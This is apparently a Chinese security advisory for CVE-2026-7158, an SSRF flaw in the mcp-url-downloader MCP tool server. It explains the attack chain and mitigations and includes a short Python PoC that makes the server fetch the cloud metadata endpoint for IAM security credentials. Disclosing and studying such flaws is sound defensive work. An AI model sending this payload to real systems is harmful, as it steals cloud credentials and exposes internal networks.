CVE-2026-7158 CVSS 7.3 高危

CVE-2026-7158 mcp-url-downloader存在SSRF漏洞

披露日期: 2026-04-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7158

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

dmitryglhf mcp-url-downloader

漏洞概述

dmitryglhf mcp-url-downloader 项目中存在严重的安全漏洞，受影响的组件为 src/mcp_url_downloader/server.py 文件中的 _validate_url_safe 函数。由于该函数未能正确验证用户传入的 URL 参数，攻击者可以通过操纵 URL 参数触发服务器端请求伪造（SSRF）。该漏洞允许未经身份认证的远程攻击者利用，且目前利用代码已被公开披露。该项目采用滚动发布模式，尚未提供具体的修复版本更新。

技术细节

该漏洞的根源在于 mcp-url-downloader 服务器对 URL 参数的验证逻辑不足。在 _validate_url_safe 函数中，程序未能有效拦截指向内网地址或非预期资源的请求。攻击者可以构造包含内网 IP 地址（如 127.0.0.1, 169.254.169.254）或特定端口号的恶意 URL。当服务器处理该 URL 时，会代替攻击者向目标发起请求。由于无需用户交互和身份认证（CVSS:3.1/AV:N/AC:L/PR:N/UI:N），攻击者可利用此漏洞探测内网拓扑、访问云服务元数据或对内部脆弱服务进行攻击，导致机密性、完整性和可用性受到低程度影响。

攻击链分析

STEP 1

1. 侦察

攻击者识别出目标正在使用存在漏洞的 dmitryglhf mcp-url-downloader 服务。

STEP 2

2. 构造Payload

攻击者构造包含恶意内网地址（如 169.254.169.254）的 URL 参数。

STEP 3

3. 发送请求

攻击者向受害者服务器发送包含恶意 URL 的请求，无需认证。

STEP 4

4. 服务端请求

受害者服务器解析 URL，绕过无效验证，向内网地址发起 HTTP 请求。

STEP 5

5. 信息泄露

服务器将内网服务的响应返回给攻击者，导致敏感信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import json
import requests

# PoC for CVE-2026-7158: SSRF in mcp-url-downloader
# Targeting the internal metadata service often used in cloud environments

target_url = "http://localhost:8000" # Replace with actual target URL

# Malicious payload attempting to access AWS metadata
ssrf_payload = {
    "method": "tools/call",
    "params": {
        "name": "download_url",
        "arguments": {
            "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
        }
    }
}

try:
    response = requests.post(target_url, json=ssrf_payload)
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
except Exception as e:
    print(f"Error: {e}")

影响范围

dmitryglhf mcp-url-downloader <= commit 4b8cf2de55f6e8864a77d108e8a94a5b8e4394c6

防御指南

临时缓解措施

在官方修复发布前，建议限制该服务的网络访问权限，仅允许受信任的来源调用。同时，在应用网关或防火墙层面配置规则，拦截对外发往 127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16 及链路本地地址的 HTTP 请求。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7158
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7158
3 Details https://www.cvedetails.com/cve/CVE-2026-7158/
4 VulDB https://vuldb.com/cve/CVE-2026-7158
5 Link https://github.com/dmitryglhf/url-download-mcp/issues/2
6 Link https://vuldb.com/submit/802062
7 Link https://vuldb.com/vuln/359757
8 Link https://vuldb.com/vuln/359757/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表